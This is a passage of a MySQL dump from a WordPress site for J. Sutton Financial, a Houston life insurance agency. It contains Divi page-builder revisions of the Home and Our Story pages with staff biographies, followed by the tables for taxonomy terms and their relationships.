custom_margin_phone=\"|||0px|false|false\" custom_margin_last_edited=\"on|phone\" global_colors_info=\"{}\"][/et_pb_button][/et_pb_column][et_pb_column type=\"1_2\" _builder_version=\"4.20.2\" _module_preset=\"default\" global_colors_info=\"{}\"][et_pb_button button_url=\"/careers/\" button_text=\"Work With Us\" button_alignment=\"center\" _builder_version=\"4.20.4\" _module_preset=\"default\" custom_button=\"on\" button_text_color=\"#000000\" button_bg_color=\"#ffffff\" button_border_width=\"0px\" button_border_radius=\"14px\" custom_margin=\"|150px|||false|false\" custom_margin_tablet=\"|150px|||false|false\" custom_margin_phone=\"|0px|||false|false\" custom_margin_last_edited=\"on|desktop\" hover_enabled=\"0\" global_colors_info=\"{}\" sticky_enabled=\"0\"][/et_pb_button][/et_pb_column][/et_pb_row][/et_pb_section][et_pb_section fb_built=\"1\" _builder_version=\"4.20.2\" _module_preset=\"default\" background_color=\"rgba(158,153,153,0.1)\" global_colors_info=\"{}\"][et_pb_row column_structure=\"1_3,2_3\" _builder_version=\"4.20.2\" _module_preset=\"default\" global_colors_info=\"{}\"][et_pb_column type=\"1_3\" _builder_version=\"4.20.2\" _module_preset=\"default\" global_colors_info=\"{}\"][dsm_perspective_image src=\"http://cmdev-site1.com/wp-content/uploads/2023/04/Thumbs-Up-Icon-No-Background-Hex-666666.png\" align=\"center\" always_center_on_mobile=\"off\" _builder_version=\"4.20.4\" _module_preset=\"default\" width=\"70%\" width_tablet=\"70%\" width_phone=\"50%\" width_last_edited=\"on|desktop\" module_alignment=\"right\" custom_margin=\"||||false|false\" custom_margin_tablet=\"|37px||89px|false|false\" custom_margin_phone=\"|0px||0px|false|false\" custom_margin_last_edited=\"on|phone\" custom_padding=\"33px|1px||||\" custom_padding_tablet=\"33px|1px||||\" custom_padding_phone=\"0px|0px|||false|false\" custom_padding_last_edited=\"on|phone\" animation_style=\"roll\" animation_direction=\"left\" animation_duration=\"1250ms\" hover_enabled=\"0\" module_alignment_tablet=\"center\" module_alignment_phone=\"center\" module_alignment_last_edited=\"on|desktop\" global_colors_info=\"{}\" sticky_enabled=\"0\"][/dsm_perspective_image][/et_pb_column][et_pb_column type=\"2_3\" _builder_version=\"4.20.2\" _module_preset=\"default\" global_colors_info=\"{}\"][et_pb_text _builder_version=\"4.20.2\" _module_preset=\"default\" header_2_text_align=\"center\" custom_margin=\"||18px|-20px||\" custom_padding=\"57px|||||\" global_colors_info=\"{}\"]<h2><strong>Providing Premium Life Insurance Policies to Americans Nationwide</strong></h2>[/et_pb_text][et_pb_text _builder_version=\"4.20.2\" _module_preset=\"default\" custom_margin=\"-7px|||-17px||\" global_colors_info=\"{}\"]<p>Sutton Financial provides high quality life insurance policies to Texans. Our agents proudly serve individuals from all walks of life, and can help you choose the right insurance policy to protect you and yours for years to come. J. Sutton Financial agents take pride in being approachable and easy to work with, helping you to make the right decisions for your family for decades to come.</p>[/et_pb_text][dsm_button button_one_text=\"Learn More\" button_one_url=\"@ET-DC@eyJkeW5hbWljIjp0cnVlLCJjb250ZW50IjoicG9zdF9saW5rX3VybF9wYWdlIiwic2V0dGluZ3MiOnsicG9zdF9pZCI6IjI2In19@\" button_one_lightbox_close_color=\"#FFFFFF\" button_two_lightbox_close_color=\"#FFFFFF\" button_alignment=\"center\" _builder_version=\"4.20.2\" _dynamic_attributes=\"button_one_url\" _module_preset=\"default\" custom_button_one=\"on\" button_one_text_color=\"#FFFFFF\" button_one_bg_color=\"#003372\" button_one_border_width=\"0px\" button_one_border_color=\"RGBA(255,255,255,0)\" button_one_border_radius=\"14px\" custom_button_two=\"on\" button_two_text_color=\"#000000\" button_two_bg_color=\"#ffffff\" button_two_border_width=\"0px\" button_two_border_color=\"RGBA(255,255,255,0)\" button_two_border_radius=\"14px\" custom_margin=\"||10px|||\" box_shadow_style_button_one=\"preset2\" global_colors_info=\"{}\"][/dsm_button][/et_pb_column][/et_pb_row][/et_pb_section][et_pb_section fb_built=\"1\" _builder_version=\"4.20.2\" _module_preset=\"default\" custom_margin=\"-15px|||||\" global_colors_info=\"{}\"][et_pb_row _builder_version=\"4.20.2\" _module_preset=\"default\" global_colors_info=\"{}\"][et_pb_column type=\"4_4\" _builder_version=\"4.20.2\" _module_preset=\"default\" global_colors_info=\"{}\"][et_pb_text _builder_version=\"4.20.2\" _module_preset=\"default\" header_2_text_align=\"center\" global_colors_info=\"{}\"]<h2><strong>Want To Know How Much Insurance You Need?</strong></h2>[/et_pb_text][et_pb_code _builder_version=\"4.20.2\" _module_preset=\"default\" global_colors_info=\"{}\"][gravityform id=\"1\" title=\"false\" description=\"false\" ajax=\"true\"][/et_pb_code][/et_pb_column][/et_pb_row][/et_pb_section][et_pb_section fb_built=\"1\" _builder_version=\"4.20.2\" _module_preset=\"default\" background_color=\"rgba(158,153,153,0.1)\" custom_margin=\"66px|||||\" custom_padding=\"1px||0px|||\" global_colors_info=\"{}\"][et_pb_row column_structure=\"2_3,1_3\" admin_label=\"Row\" _builder_version=\"4.20.2\" _module_preset=\"default\" custom_margin=\"10px|auto||auto||\" custom_padding=\"66px||66px|||\" global_colors_info=\"{}\"][et_pb_column type=\"2_3\" _builder_version=\"4.20.2\" _module_preset=\"default\" global_colors_info=\"{}\"][et_pb_text _builder_version=\"4.20.2\" _module_preset=\"default\" text_text_color=\"#000000\" text_font_size=\"16px\" header_2_text_align=\"center\" header_2_text_color=\"#000000\" custom_padding=\"||0px|||\" global_colors_info=\"{}\"]<h2 style=\"text-align: center;\">Join Our Team!</h2>\n<p>J. Sutton Financial is always looking for new, motivated talent to join our fun team of highly trained agents and managers. If you\'re looking to break out of the standard mold and take your career to the next level, look no further. Find out how you can grow together with J. Sutton Financial.</p>[/et_pb_text][dsm_button button_one_text=\"Apply Now!\" button_one_url=\"@ET-DC@eyJkeW5hbWljIjp0cnVlLCJjb250ZW50IjoicG9zdF9saW5rX3VybF9wYWdlIiwic2V0dGluZ3MiOnsicG9zdF9pZCI6IjM4In19@\" button_alignment=\"center\" _builder_version=\"4.20.2\" _dynamic_attributes=\"button_one_url\" _module_preset=\"default\" custom_button_one=\"on\" button_one_text_color=\"#FFFFFF\" button_one_bg_color=\"#003372\" button_one_border_width=\"0px\" button_one_border_radius=\"14px\" box_shadow_style_button_one=\"preset2\" global_colors_info=\"{}\"][/dsm_button][/et_pb_column][et_pb_column type=\"1_3\" _builder_version=\"4.20.2\" _module_preset=\"default\" global_colors_info=\"{}\"][dsm_perspective_image src=\"http://cmdev-site1.com/wp-content/uploads/2023/03/People-Icon.png\" always_center_on_mobile=\"off\" _builder_version=\"4.20.4\" _module_preset=\"default\" width=\"70%\" width_tablet=\"70%\" width_phone=\"50%\" width_last_edited=\"on|desktop\" module_alignment=\"left\" custom_margin=\"|||0px||\" custom_margin_tablet=\"|||0px||\" custom_margin_phone=\"|||0px||\" custom_margin_last_edited=\"on|desktop\" custom_padding=\"|||0px||\" animation_direction=\"left\" hover_enabled=\"0\" module_alignment_tablet=\"center\" module_alignment_phone=\"center\" module_alignment_last_edited=\"on|phone\" global_colors_info=\"{}\" sticky_enabled=\"0\"][/dsm_perspective_image][/et_pb_column][/et_pb_row][/et_pb_section][et_pb_section fb_built=\"1\" _builder_version=\"4.20.2\" _module_preset=\"default\" background_image=\"http://cmdev-site1.com/wp-content/uploads/2023/03/Downtown-Houston-skyline-Black-White-6139-x-2500-scaled.jpg\" parallax=\"on\" custom_margin=\"-11px|||||\" custom_padding=\"11px||0px|||\" global_colors_info=\"{}\"][et_pb_row _builder_version=\"4.20.2\" _module_preset=\"default\" min_height=\"199.3px\" custom_padding=\"67px||141px|||\" global_colors_info=\"{}\"][et_pb_column type=\"4_4\" _builder_version=\"4.20.2\" _module_preset=\"default\" global_colors_info=\"{}\"][dsm_typing_effect typing_effect=\"Proudly headquartered in Houston, Texas!\" typing_cursor_color=\"#FFFFFF\" typing_background_color=\"RGBA(255,255,255,0)\" _builder_version=\"4.20.2\" _module_preset=\"default\" header_level=\"h2\" header_text_align=\"center\" typing_text_color=\"#FFFFFF\" custom_margin=\"54px|||||\" global_colors_info=\"{}\"][/dsm_typing_effect][/et_pb_column][/et_pb_row][/et_pb_section][et_pb_section fb_built=\"1\" _builder_version=\"4.20.2\" _module_preset=\"default\" background_color=\"#666666\" custom_padding=\"0px||0px|||\" global_colors_info=\"{}\"][et_pb_row column_structure=\"2_5,3_5\" _builder_version=\"4.20.2\" _module_preset=\"default\" height=\"148px\" custom_margin=\"-20px|auto||auto|false|false\" custom_padding=\"66px||66px||false|false\" global_colors_info=\"{}\"][et_pb_column type=\"2_5\" _builder_version=\"4.20.2\" _module_preset=\"default\" global_colors_info=\"{}\"][et_pb_image src=\"http://cmdev-site1.com/wp-content/uploads/2023/03/j-sutton-logo-white-no-background.png\" title_text=\"j sutton logo white no background\" _builder_version=\"4.20.2\" _module_preset=\"default\" width=\"46.1%\" width_tablet=\"75%\" width_phone=\"75%\" width_last_edited=\"on|phone\" module_alignment=\"center\" custom_margin=\"|188px||188px||true\" global_colors_info=\"{}\"][/et_pb_image][/et_pb_column][et_pb_column type=\"3_5\" _builder_version=\"4.20.2\" _module_preset=\"default\" global_colors_info=\"{}\"][et_pb_text _builder_version=\"4.20.2\" _module_preset=\"default\" text_text_color=\"#FFFFFF\" link_font=\"||||on|||#f9f9f9|dotted\" link_text_color=\"#f9f9f9\" background_layout=\"dark\" custom_margin=\"12px|||||\" custom_padding=\"0px|0px|0px|||\" global_colors_info=\"{}\"]<p style=\"text-align: center;\">340 North Sam Houston Parkway East<br />Houston, TX 77060<br /><a href=\"mailto:info@JSuttonFinancial.com\">info@JSuttonFinancial.com</a><br /><a href=\"tel:713-254-3439\">(713) 254-3439</a></p>[/et_pb_text][/et_pb_column][/et_pb_row][et_pb_row _builder_version=\"4.20.2\" _module_preset=\"default\" global_colors_info=\"{}\"][et_pb_column type=\"4_4\" _builder_version=\"4.20.2\" _module_preset=\"default\" global_colors_info=\"{}\"][et_pb_text _builder_version=\"4.20.2\" _module_preset=\"default\" min_height=\"24.8px\" custom_margin=\"||66px|||\" global_colors_info=\"{}\"]<p style=\"text-align: center;\"><span style=\"color: #ffffff;\">©2023 J. Sutton Financial | All Rights Reserved | Privacy Policy</span></p>[/et_pb_text][/et_pb_column][/et_pb_row][/et_pb_section]','Home','','inherit','closed','closed','','138-revision-v1','','','2023-04-11 21:38:14','2023-04-11 21:38:14','',138,'http://cmdev-site1.com/?p=908',0,'revision','',0),(914,3,'2023-04-12 15:16:54','0000-00-00 00:00:00','','Auto Draft','','auto-draft','open','open','','','','','2023-04-12 15:16:54','0000-00-00 00:00:00','',0,'http://cmdev-site1.com/?p=914',0,'post','',0),(912,3,'2023-04-11 21:41:05','2023-04-11 21:41:05','[et_pb_section fb_built=\"1\" _builder_version=\"4.20.2\" _module_preset=\"default\" background_color=\"#666666\" custom_padding=\"||17px|||\" global_colors_info=\"{}\"][et_pb_row _builder_version=\"4.20.2\" _module_preset=\"default\" global_colors_info=\"{}\"][et_pb_column type=\"4_4\" _builder_version=\"4.20.2\" _module_preset=\"default\" global_colors_info=\"{}\"][et_pb_text _builder_version=\"4.20.2\" _module_preset=\"default\" header_2_text_color=\"#FFFFFF\" header_2_font_size=\"50px\" global_colors_info=\"{}\"]<h2>Our Story</h2>[/et_pb_text][/et_pb_column][/et_pb_row][/et_pb_section][et_pb_section fb_built=\"1\" _builder_version=\"4.20.2\" _module_preset=\"default\" global_colors_info=\"{}\"][et_pb_row _builder_version=\"4.20.2\" _module_preset=\"default\" global_colors_info=\"{}\"][et_pb_column type=\"4_4\" _builder_version=\"4.20.2\" _module_preset=\"default\" global_colors_info=\"{}\"][et_pb_text _builder_version=\"4.20.2\" _module_preset=\"default\" global_colors_info=\"{}\"]<p>J. Sutton Financial was founded in 2022 with a vision to extend career opportunities beyond its home city.</p>\n<p>We service clients and work as a team at our home office in Houston as well as 100% remote. This allows us to not only have an incredible office culture but also service more clients with an agent reach from coast-to-coast.</p>[/et_pb_text][dsm_text_divider header=\"Partners\" _builder_version=\"4.20.2\" _module_preset=\"default\" header_level=\"h2\" global_colors_info=\"{}\"][/dsm_text_divider][et_pb_text _builder_version=\"4.20.2\" _module_preset=\"default\" global_colors_info=\"{}\"]<p><span style=\"font-weight: 400;\">J. Sutton Financial believes in delivering a wonderful experience, enterprise professionalism, and real results. Step one to our success has always been putting our clients first. We\'re always looking to grow with the right people. Take a look below to learn more about our partners and how you, too, can join our incredible team!</span></p>[/et_pb_text][/et_pb_column][/et_pb_row][et_pb_row column_structure=\"2_5,3_5\" _builder_version=\"4.20.2\" _module_preset=\"default\" global_colors_info=\"{}\"][et_pb_column type=\"2_5\" _builder_version=\"4.20.2\" _module_preset=\"default\" global_colors_info=\"{}\"][et_pb_image src=\"http://cmdev-site1.com/wp-content/uploads/2023/03/justinsuttonheadshotsmall-Black-White.png\" _builder_version=\"4.20.4\" _module_preset=\"default\" hover_enabled=\"0\" global_colors_info=\"{}\" sticky_enabled=\"0\"][/et_pb_image][/et_pb_column][et_pb_column type=\"3_5\" _builder_version=\"4.20.2\" _module_preset=\"default\" global_colors_info=\"{}\"][et_pb_text _builder_version=\"4.20.2\" _module_preset=\"default\" header_3_text_color=\"#003372\" custom_margin=\"10%||||false|false\" global_colors_info=\"{}\"]<h3><b>Justin Sutton</b></h3>\n<p><em><span style=\"font-weight: 400;\">Owner/Founder</span></em></p>\n<p><span style=\"font-weight: 400;\">Justin has worked in the financial services industry for over 8 years. In 2016 the Giddens Nation was formed, where Justin worked alongside brothers Ryan and Stephen, running a satellite office in Waco, TX, and eventually becoming the Senior Regional Director of the Giddens-Giddens Agency. In 2022 Justin formed J. Sutton Financial to extend the reach of the Giddens-Giddens agency into the 100% remote hemisphere of the Financial Services Industry.</span></p>[/et_pb_text][/et_pb_column][/et_pb_row][et_pb_row column_structure=\"2_5,3_5\" _builder_version=\"4.20.2\" _module_preset=\"default\" global_colors_info=\"{}\"][et_pb_column type=\"2_5\" _builder_version=\"4.20.2\" _module_preset=\"default\" global_colors_info=\"{}\"][et_pb_image src=\"http://cmdev-site1.com/wp-content/uploads/2023/03/Seth.jpg\" _builder_version=\"4.20.4\" _module_preset=\"default\" hover_enabled=\"0\" global_colors_info=\"{}\" sticky_enabled=\"0\"][/et_pb_image][/et_pb_column][et_pb_column type=\"3_5\" _builder_version=\"4.20.2\" _module_preset=\"default\" global_colors_info=\"{}\"][et_pb_text _builder_version=\"4.20.2\" _module_preset=\"default\" header_3_text_color=\"#003372\" custom_margin=\"10%||||false|false\" global_colors_info=\"{}\"]<h3><b>Seth Ordeneaux</b></h3>\n<p><em><span style=\"font-weight: 400;\">Managing Director</span></em></p>\n<p><span style=\"font-weight: 400;\">Since starting with the company in April 2020, Seth has had the opportunity to learn from and develop some of the top leaders in our company. His ability to build relationships with his clients and colleagues has led him to become one of the Top managers in our industry, with several notable accomplishments from top representative to top manager in a very short amount of time.</span></p>[/et_pb_text][/et_pb_column][/et_pb_row][et_pb_row column_structure=\"2_5,3_5\" _builder_version=\"4.20.2\" _module_preset=\"default\" global_colors_info=\"{}\"][et_pb_column type=\"2_5\" _builder_version=\"4.20.2\" _module_preset=\"default\" global_colors_info=\"{}\"][et_pb_image src=\"http://cmdev-site1.com/wp-content/uploads/2023/03/Matthew-Sutton.jpg\" _builder_version=\"4.20.4\" _module_preset=\"default\" hover_enabled=\"0\" global_colors_info=\"{}\" sticky_enabled=\"0\"][/et_pb_image][/et_pb_column][et_pb_column type=\"3_5\" _builder_version=\"4.20.2\" _module_preset=\"default\" global_colors_info=\"{}\"][et_pb_text _builder_version=\"4.20.2\" _module_preset=\"default\" header_3_text_color=\"#003372\" custom_margin=\"10%||||false|false\" custom_padding=\"||52px|||\" global_colors_info=\"{}\"]<h3><b>Matthew Sutton</b></h3>\n<p><em><span style=\"font-weight: 400;\">Managing Director</span></em></p>\n<p><span style=\"font-weight: 400;\">Matthew\'s career has been nothing short of incredible. With just 5 years in the financial services industry, Matthew has accomplished achievement after achievement. In recent years he has won two separate contests (March Madness/Battle of the Nation), and if that wasn\'t enough, he also leads one of the most powerful teams in our industry.</span></p>[/et_pb_text][/et_pb_column][/et_pb_row][et_pb_row column_structure=\"2_5,3_5\" _builder_version=\"4.20.2\" _module_preset=\"default\" global_colors_info=\"{}\"][et_pb_column type=\"2_5\" _builder_version=\"4.20.2\" _module_preset=\"default\" global_colors_info=\"{}\"][et_pb_image src=\"http://cmdev-site1.com/wp-content/uploads/2023/03/Andres-Cano.jpg\" _builder_version=\"4.20.4\" _module_preset=\"default\" hover_enabled=\"0\" global_colors_info=\"{}\" sticky_enabled=\"0\"][/et_pb_image][/et_pb_column][et_pb_column type=\"3_5\" _builder_version=\"4.20.2\" _module_preset=\"default\" global_colors_info=\"{}\"][et_pb_text _builder_version=\"4.20.2\" _module_preset=\"default\" header_3_text_color=\"#003372\" custom_margin=\"10%||||false|false\" global_colors_info=\"{}\"]<h3><b>Andres Cano</b></h3>\n<p><em><span style=\"font-weight: 400;\">Managing Director</span></em></p>\n<p><span style=\"font-weight: 400;\">Andres\' career with J. Sutton Financial started in the middle of the pandemic. As a recent college graduate from the University of Texas at El Paso Andres found an opportunity to excel within a troubling job market at J. Sutton Financial. Andres is currently working with his team on the expansion of our Latino Division.</span></p>[/et_pb_text][/et_pb_column][/et_pb_row][/et_pb_section]','Our Story','','inherit','closed','closed','','702-revision-v1','','','2023-04-11 21:41:05','2023-04-11 21:41:05','',702,'http://cmdev-site1.com/?p=912',0,'revision','',0);
/*!40000 ALTER TABLE `wpfi_posts` ENABLE KEYS */;
UNLOCK TABLES;

--
-- Table structure for table `wpfi_term_relationships`
--

DROP TABLE IF EXISTS `wpfi_term_relationships`;
/*!40101 SET @saved_cs_client     = @@character_set_client */;
/*!40101 SET character_set_client = utf8 */;
CREATE TABLE `wpfi_term_relationships` (
  `object_id` bigint(20) unsigned NOT NULL DEFAULT 0,
  `term_taxonomy_id` bigint(20) unsigned NOT NULL DEFAULT 0,
  `term_order` int(11) NOT NULL DEFAULT 0,
  PRIMARY KEY (`object_id`,`term_taxonomy_id`),
  KEY `term_taxonomy_id` (`term_taxonomy_id`)
) ENGINE=MyISAM DEFAULT CHARSET=utf8mb4 COLLATE=utf8mb4_unicode_ci;
/*!40101 SET character_set_client = @saved_cs_client */;

--
-- Dumping data for table `wpfi_term_relationships`
--

LOCK TABLES `wpfi_term_relationships` WRITE;
/*!40000 ALTER TABLE `wpfi_term_relationships` DISABLE KEYS */;
INSERT INTO `wpfi_term_relationships` VALUES (416,76,0),(6,2,0),(10,3,0),(13,3,0),(14,3,0),(684,102,0),(723,103,0),(723,102,0),(54,6,0),(54,5,0),(54,7,0),(416,5,0),(57,8,0),(57,9,0),(57,10,0),(57,11,0),(57,12,0),(57,13,0),(61,14,0),(61,5,0),(61,15,0),(65,16,0),(65,5,0),(65,17,0),(65,18,0),(65,19,0),(68,20,0),(68,5,0),(68,21,0),(68,22,0),(71,23,0),(71,5,0),(71,24,0),(71,25,0),(71,26,0),(74,27,0),(74,5,0),(74,12,0),(74,28,0),(74,13,0),(74,29,0),(77,11,0),(77,5,0),(77,30,0),(77,31,0),(77,23,0),(77,32,0),(77,33,0),(77,34,0),(77,35,0),(77,28,0),(80,36,0),(80,5,0),(80,37,0),(80,30,0),(80,28,0),(80,38,0),(57,5,0),(684,103,0),(242,5,0),(242,39,0),(242,40,0),(242,30,0),(242,33,0),(246,41,0),(246,5,0),(246,42,0),(246,16,0),(246,12,0),(246,43,0),(246,44,0),(246,45,0),(246,46,0),(253,47,0),(249,5,0),(253,5,0),(253,27,0),(253,12,0),(253,48,0),(256,47,0),(256,5,0),(256,12,0),(256,27,0),(256,13,0),(256,9,0),(278,47,0),(278,5,0),(278,27,0),(278,12,0),(278,48,0),(278,49,0),(295,50,0),(295,5,0),(295,16,0),(295,51,0),(295,52,0),(295,53,0),(306,54,0),(306,5,0),(306,55,0),(306,56,0),(306,28,0),(306,37,0),(311,57,0),(311,5,0),(311,58,0),(311,37,0),(311,28,0),(311,13,0),(315,59,0),(315,5,0),(315,60,0),(315,61,0),(318,62,0),(318,5,0),(318,63,0),(318,13,0),(318,27,0),(318,12,0),(318,10,0),(321,11,0),(321,5,0),(321,29,0),(321,64,0),(321,12,0),(321,13,0),(321,65,0),(321,66,0),(324,67,0),(324,5,0),(324,68,0),(324,12,0),(324,13,0),(324,27,0),(327,23,0),(327,5,0),(327,68,0),(327,69,0),(327,70,0),(327,27,0),(327,12,0),(327,13,0),(333,27,0),(333,5,0),(333,12,0),(333,13,0),(333,71,0),(333,72,0),(343,73,0),(343,5,0),(343,12,0),(343,13,0),(343,27,0),(345,13,0),(345,5,0),(345,47,0),(345,27,0),(345,12,0),(345,9,0),(345,10,0),(345,74,0),(345,75,0),(384,4,0),(416,77,0),(416,27,0),(416,12,0),(416,13,0),(419,71,0),(419,5,0),(419,72,0),(419,27,0),(419,12,0),(419,13,0),(422,78,0),(422,5,0),(422,72,0),(422,71,0),(422,79,0),(422,80,0),(426,81,0),(426,5,0),(426,82,0),(426,83,0),(426,71,0),(426,84,0),(426,85,0),(431,86,0),(431,5,0),(431,87,0),(431,27,0),(431,12,0),(431,13,0),(436,77,0),(436,5,0),(436,27,0),(436,12,0),(436,36,0),(436,88,0),(436,89,0),(436,13,0),(453,90,0),(453,5,0),(453,91,0),(453,92,0),(453,93,0),(453,94,0),(453,27,0),(453,12,0),(457,85,0),(457,5,0),(457,71,0),(457,72,0),(457,95,0),(457,69,0),(457,96,0),(457,97,0),(457,98,0),(461,99,0),(461,5,0),(461,16,0),(461,100,0),(510,3,0),(514,101,0),(514,102,0),(514,103,0),(516,101,0),(516,102,0),(516,103,0),(516,104,0),(516,105,0),(522,101,0),(522,102,0),(522,103,0),(522,106,0),(523,3,0),(528,3,0),(533,101,0),(533,102,0),(533,103,0),(534,101,0),(534,102,0),(534,103,0),(577,101,0),(577,102,0),(577,103,0),(578,101,0),(578,102,0),(578,103,0),(581,101,0),(581,102,0),(581,103,0),(585,101,0),(585,102,0),(585,103,0),(587,101,0),(587,107,0),(587,103,0),(592,101,0),(592,102,0),(592,103,0),(723,101,0),(684,101,0),(693,101,0),(693,3,0),(693,103,0),(711,4,0),(707,4,0),(708,4,0),(709,4,0),(741,101,0),(741,108,0),(741,103,0),(745,1,0),(759,101,0),(759,102,0),(759,103,0),(816,1,0),(834,101,0),(834,102,0),(834,103,0),(835,101,0),(835,102,0),(835,103,0),(842,101,0),(842,102,0),(842,103,0),(878,101,0),(878,102,0),(878,103,0);
/*!40000 ALTER TABLE `wpfi_term_relationships` ENABLE KEYS */;
UNLOCK TABLES;

--
-- Table structure for table `wpfi_term_taxonomy`
--

DROP TABLE IF EXISTS `wpfi_term_taxonomy`;
/*!40101 SET @saved_cs_client     = @@character_set_client */;
/*!40101 SET character_set_client = utf8 */;
CREATE TABLE `wpfi_term_taxonomy` (
  `term_taxonomy_id` bigint(20) unsigned NOT NULL AUTO_INCREMENT,
  `term_id` bigint(20) unsigned NOT NULL DEFAULT 0,
  `taxonomy` varchar(32) NOT NULL DEFAULT '',
  `description` longtext NOT NULL,
  `parent` bigint(20) unsigned NOT NULL DEFAULT 0,
  `count` bigint(20) NOT NULL DEFAULT 0,
  PRIMARY KEY (`term_taxonomy_id`),
  UNIQUE KEY `term_id_taxonomy` (`term_id`,`taxonomy`),
  KEY `taxonomy` (`taxonomy`)
) ENGINE=MyISAM AUTO_INCREMENT=109 DEFAULT CHARSET=utf8mb4 COLLATE=utf8mb4_unicode_ci;
/*!40101 SET character_set_client = @saved_cs_client */;

--
-- Dumping data for table `wpfi_term_taxonomy`
--

LOCK TABLES `wpfi_term_taxonomy` WRITE;
/*!40000 ALTER TABLE `wpfi_term_taxonomy` DISABLE KEYS */;
INSERT INTO `wpfi_term_taxonomy` VALUES (1,1,'category','',0,0),(2,2,'wp_theme','',0,1),(3,3,'layout_type','',0,1),(4,4,'nav_menu','',0,5),(5,5,'category','',0,26),(6,6,'post_tag','',0,1),(7,7,'post_tag','',0,1),(8,8,'post_tag','',0,1),(9,9,'post_tag','',0,3),(10,10,'post_tag','',0,3),(11,11,'post_tag','',0,3),(12,12,'post_tag','',0,13),(13,13,'post_tag','',0,11),(14,14,'post_tag','',0,1),(15,15,'post_tag','',0,1),(16,16,'post_tag','',0,3),(17,17,'post_tag','',0,1),(18,18,'post_tag','',0,1),(19,19,'post_tag','',0,1),(20,20,'post_tag','',0,1),(21,21,'post_tag','',0,1),(22,22,'post_tag','',0,1),(23,23,'post_tag','',0,3),(24,24,'post_tag','',0,1),(25,25,'post_tag','',0,1),(26,26,'post_tag','',0,1),(27,27,'post_tag','',0,10),(28,28,'post_tag','',0,5),(29,29,'post_tag','',0,2),(30,30,'post_tag','',0,3),(31,31,'post_tag','',0,1),(32,32,'post_tag','',0,1),(33,33,'post_tag','',0,2),(34,34,'post_tag','',0,1),(35,35,'post_tag','',0,1),(36,36,'post_tag','',0,1),(37,37,'post_tag','',0,3),(38,38,'post_tag','',0,1),(39,39,'post_tag','',0,1),(40,40,'post_tag','',0,1),(41,41,'post_tag','',0,1),(42,42,'post_tag','',0,1),(43,43,'post_tag','',0,1),(44,44,'post_tag','',0,1),(45,45,'post_tag','',0,1),(46,46,'post_tag','',0,1),(47,47,'post_tag','',0,4),(48,48,'post_tag','',0,2),(49,49,'post_tag','',0,1),(50,50,'post_tag','',0,1),(51,51,'post_tag','',0,1),(52,52,'post_tag','',0,1),(53,53,'post_tag','',0,1),(54,54,'post_tag','',0,1),(55,55,'post_tag','',0,1),(56,56,'post_tag','',0,1),(57,57,'post_tag','',0,1),(58,58,'post_tag','',0,1),(59,59,'post_tag','',0,1),(60,60,'post_tag','',0,1),(61,61,'post_tag','',0,1),(62,62,'post_tag','',0,1),(63,63,'post_tag','',0,1),(64,64,'post_tag','',0,1),(65,65,'post_tag','',0,1),(66,66,'post_tag','',0,1),(67,67,'post_tag','',0,1),(68,68,'post_tag','',0,2),(69,69,'post_tag','',0,1),(70,70,'post_tag','',0,1),(71,71,'post_tag','',0,1),(72,72,'post_tag','',0,1),(73,73,'post_tag','',0,1),(74,74,'post_tag','',0,1),(75,75,'post_tag','',0,1),(76,76,'post_tag','',0,0),(77,77,'post_tag','',0,0),(78,78,'post_tag','',0,0),(79,79,'post_tag','',0,0),(80,80,'post_tag','',0,0),(81,81,'post_tag','',0,0),(82,82,'post_tag','',0,0),(83,83,'post_tag','',0,0),(84,84,'post_tag','',0,0),(85,85,'post_tag','',0,0),(86,86,'post_tag','',0,0),(87,87,'post_tag','',0,0),(88,88,'post_tag','',0,0),(89,89,'post_tag','',0,0),(90,90,'post_tag','',0,0),(91,91,'post_tag','',0,0),(92,92,'post_tag','',0,0),(93,93,'post_tag','',0,0),(94,94,'post_tag','',0,0),(95,95,'post_tag','',0,0),(96,96,'post_tag','',0,0),(97,97,'post_tag','',0,0),(98,98,'post_tag','',0,0),(99,99,'post_tag','',0,0),(100,100,'post_tag','',0,0),(101,101,'scope','',0,19),(102,102,'layout_type','',0,16),(103,103,'module_width','',0,19),(104,104,'layout_category','',0,0),(105,105,'layout_tag','',0,0),(107,107,'layout_type','',0,1),(106,106,'layout_tag','',0,1),(108,108,'layout_type','',0,1);
/*!40000 ALTER TABLE `wpfi_term_taxonomy` ENABLE KEYS */;
UNLOCK TABLES;

--
-- Table structure for table `wpfi_termmeta`
--

DROP TABLE IF EXISTS `wpfi_termmeta`;
/*!40101 SET @saved_cs_client     = @@character_set_client */;
/*!40101 SET character_set_client = utf8 */;
CREATE TABLE `wpfi_termmeta` (
  `meta_id` bigint(20) unsigned NOT NULL AUTO_INCREMENT,
  `term_id` bigint(20) unsigned NOT NULL DEFAULT 0,
  `meta_key` varchar(255) DEFAULT NULL,
  `meta_value` longtext DEFAULT NULL,
  PRIMARY KEY (`meta_id`),
  KEY `term_id` (`term_id`),
  KEY `meta_key` (`meta_key`(191))
) ENGINE=MyISAM DEFAULT CHARSET=utf8mb4 COLLATE=utf8mb4_unicode_ci;
/*!40101 SET character_set_client = @saved_cs_client */;

--
-- Dumping data for table `wpfi_termmeta`
--

LOCK TABLES `wpfi_termmeta` WRITE;
/*!40000 ALTER TABLE `wpfi_termmeta` DISABLE KEYS */;
/*!40000 ALTER TABLE `wpfi_termmeta` ENABLE KEYS */;
UNLOCK TABLES;

--
-- Table structure for table `wpfi_terms`
--

DROP TABLE IF EXISTS `wpfi_terms`;
/*!40101 SET @saved_cs_client     = @@character_set_client */;
/*!40101 SET character_set_client = utf8 */;
CREATE TABLE `wpfi_terms` (
  `term_id` bigint(20) unsigned NOT NULL AUTO_INCREMENT,
  `name` varchar(200) NOT NULL DEFAULT '',
  `slug` varchar(200) NOT NULL DEFAULT '',
  `term_group` bigint(10) NOT NULL DEFAULT 0,
  PRIMARY KEY (`term_id`),
  KEY `slug` (`slug`(191)),
  KEY `name` (`name`(191))
) ENGINE=MyISAM AUTO_INCREMENT=109 DEFAULT CHARSET=utf8mb4 COLLATE=utf8mb4_unicode_ci;
/*!40101 SET character_set_client = @saved_cs_client */;

--
-- Dumping data for table `wpfi_terms`
--

LOCK TABLES `wpfi_terms` WRITE;
/*!40000 ALTER TABLE `wpfi_terms` DISABLE KEYS */;
